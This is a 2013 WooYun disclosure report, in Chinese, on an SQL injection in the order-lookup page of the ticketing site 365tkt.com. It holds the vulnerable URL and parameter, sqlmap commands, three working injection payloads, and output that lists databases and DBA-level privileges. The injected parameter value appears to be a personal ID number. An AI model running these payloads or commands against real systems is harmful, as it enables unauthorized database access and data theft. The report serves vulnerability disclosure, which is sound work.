漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-044739
漏洞标题:365票讯网一处SQL注入漏洞
相关厂商:365汽车网
漏洞作者: atrino
提交时间:2013-12-03 12:23
修复时间:2014-01-17 12:24
公开时间:2014-01-17 12:24
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
365票讯网订单查询功能存在SQL注入,可获得后台全部数据库信息。
详细说明:
1. 怀疑订单查询功能存在问题
http://www.365tkt.com/?c=order2&a=index
POST数据为eport=370325198408318026
2. 将POST数据改为eport=370325198408318026',果然出现异常,基本就可以注入了:
exception 'FLEA_Db_Exception_SqlQuery' with message 'SQL 错误消息: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...
3. Alex-Mac:sqlmapproject-sqlmap-7054586 mac$ python sqlmap.py -u "http://www.365tkt.com/?c=order2&a=index" --random-agent --data "eport=370325198408318026"
POST parameter 'eport' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 277 HTTP(s) requests:
---
Place: POST
Parameter: eport
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: eport=370325198408318026' RLIKE (SELECT (CASE WHEN (3777=3777) THEN 370325198408318026 ELSE 0x28 END)) AND 'vOcV'='vOcV
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: eport=370325198408318026' AND (SELECT 2087 FROM(SELECT COUNT(*),CONCAT(0x716f726171,(SELECT (CASE WHEN (2087=2087) THEN 1 ELSE 0 END)),0x71747a6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bjqb'='bjqb
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: eport=370325198408318026' AND 9438=BENCHMARK(5000000,MD5(0x4b594276)) AND 'TTZi'='TTZi
漏洞证明:
Alex-Mac:sqlmapproject-sqlmap-7054586 mac$ python sqlmap.py -u "http://www.365tkt.com/?c=order2&a=index" --random-agent --data "eport=370325198408318026" --dbs
[20:31:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[20:31:11] [INFO] fetching database names
[20:31:11] [INFO] the SQL query used returns 16 entries
[20:31:11] [INFO] retrieved: information_schema
[20:31:11] [INFO] retrieved: data_backup
[20:31:12] [INFO] retrieved: ies
[20:31:12] [INFO] retrieved: ies_3701010101
[20:31:12] [INFO] retrieved: ies_9999999999
[20:31:12] [INFO] retrieved: mysql
[20:31:13] [INFO] retrieved: test_sync
[20:31:13] [INFO] retrieved: web_dyzz
[20:31:13] [INFO] retrieved: web_hnsmxhh
[20:31:13] [INFO] retrieved: web_wfkyzz
[20:31:13] [INFO] retrieved: web_ytjyjt
[20:31:14] [INFO] retrieved: webim
[20:31:14] [INFO] retrieved: yuanzh
[20:31:14] [INFO] retrieved: yz118114
[20:31:14] [INFO] retrieved: yzsns
[20:31:14] [INFO] retrieved: yzweb
available databases [16]:
[*] data_backup
[*] ies
[*] ies_3701010101
[*] ies_9999999999
[*] information_schema
[*] mysql
[*] test_sync
[*] web_dyzz
[*] web_hnsmxhh
[*] web_wfkyzz
[*] web_ytjyjt
[*] webim
[*] yuanzh
[*] yz118114
[*] yzsns
[*] yzweb
database management system users privileges:
[*] 'root'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'yzuser'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[21:04:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5
[21:04:53] [INFO] testing if current user is DBA
[21:04:53] [INFO] fetching current user
[21:04:54] [WARNING] reflective value(s) found and filtering out
[21:04:54] [INFO] retrieved: root@localhost
current user is DBA: True
修复方案:
好好过滤,细细防护。
版权声明:转载请注明来源 atrino@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝